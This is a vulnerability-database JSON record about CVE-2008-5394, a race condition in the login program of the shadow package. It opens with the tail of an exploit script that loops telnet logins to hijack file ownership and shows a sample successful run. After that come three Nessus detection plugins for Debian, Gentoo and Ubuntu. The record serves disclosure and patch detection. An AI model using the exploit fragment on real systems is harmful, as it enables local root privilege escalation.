if login succeeds, just exit for next try..."\r\n /usr/bin/telnet $HOST\r\n\r\n LS=`ls -ld $ATK`\r\n case "$LS" in\r\n *root*root* ) ;; # not done yet...\r\n * )\r\n echo; echo\r\n echo "Success after $LOOP tries!"\r\n echo "$LS"\r\n echo; echo\r\n break\r\n ;;\r\n esac\r\ndone\r\n\r\nkill $JIG\r\nrm /tmp/fillutmp /tmp/jigglelnk /tmp/x\r\n\r\n# ...\r\n# ~$ logout\r\n# Connection closed by foreign host.\r\n# Success after 12 tries!\r\n# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4572", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-06T09:45:16", "description": "Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.", "edition": 25, "published": "2009-01-21T00:00:00", "title": "Debian DSA-1709-1 : shadow - race condition", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "modified": "2009-01-21T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:shadow"], "id": "DEBIAN_DSA-1709.NASL", "href": "https://www.tenable.com/plugins/nessus/35431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1709. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"DSA\", value:\"1709\");\n\n script_name(english:\"Debian DSA-1709-1 : shadow - race condition\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Szabo discovered that login, the system login tool, did not\ncorrectly handle symlinks while setting up tty permissions. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=505271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1709\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the shadow package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 4.0.18.1-7+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/21\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"login\", reference:\"4.0.18.1-7+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"passwd\", reference:\"4.0.18.1-7+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:28", "description": "The remote host is affected by the vulnerability described in GLSA-200903-24\n(Shadow: Privilege escalation)\n\n Paul Szabo reported a race condition in the 'login' executable when\n setting up tty permissions.\n \nImpact :\n\n A local attacker belonging to the 'utmp' group could use symlink\n attacks to overwrite arbitrary files and possibly gain root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2009-03-11T00:00:00", "title": "GLSA-200903-24 : Shadow: Privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "modified": "2009-03-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:shadow"], "id": "GENTOO_GLSA-200903-24.NASL", "href": 
"https://www.tenable.com/plugins/nessus/35905", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200903-24.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35905);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"GLSA\", value:\"200903-24\");\n\n script_name(english:\"GLSA-200903-24 : Shadow: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-24\n(Shadow: Privilege escalation)\n\n Paul Szabo reported a race condition in the 'login' executable when\n setting up tty permissions.\n \nImpact :\n\n A local attacker belonging to the 'utmp' group could use symlink\n attacks to overwrite arbitrary files and possibly gain root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Shadow users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-apps/shadow-4.1.2.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-apps/shadow\", unaffected:make_list(\"ge 4.1.2.2\"), vulnerable:make_list(\"lt 4.1.2.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Shadow\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:21", "description": "Paul Szabo discovered a race condition in login. While setting up tty\npermissions, login did not correctly handle symlinks. 
If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2009-04-23T00:00:00", "title": "Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : shadow vulnerability (USN-695-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5394"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:login", "p-cpe:/a:canonical:ubuntu_linux:passwd", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-695-1.NASL", "href": "https://www.tenable.com/plugins/nessus/37654", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-695-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37654);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-5394\");\n script_xref(name:\"USN\", value:\"695-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : shadow vulnerability (USN-695-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Szabo discovered a race condition in login. While setting up tty\npermissions, login did not correctly handle symlinks. If a local\nattacker were able to gain control of the system utmp file, they could\ncause login to change the ownership and permissions on arbitrary\nfiles, leading to a root privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/695-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected login and / or passwd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:login\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:passwd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|7\\.10|8\\.04|8\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 7.10 / 8.04 / 8.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"login\", pkgver:\"1:4.0.13-7ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"passwd\", pkgver:\"4.0.13-7ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"login\", pkgver:\"1:4.0.18.1-9ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"passwd\", pkgver:\"4.0.18.1-9ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"login\", pkgver:\"1:4.0.18.2-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"passwd\", pkgver:\"4.0.18.2-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"login\", pkgver:\"1:4.1.1-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"passwd\", pkgver:\"4.1.1-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"login / passwd\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}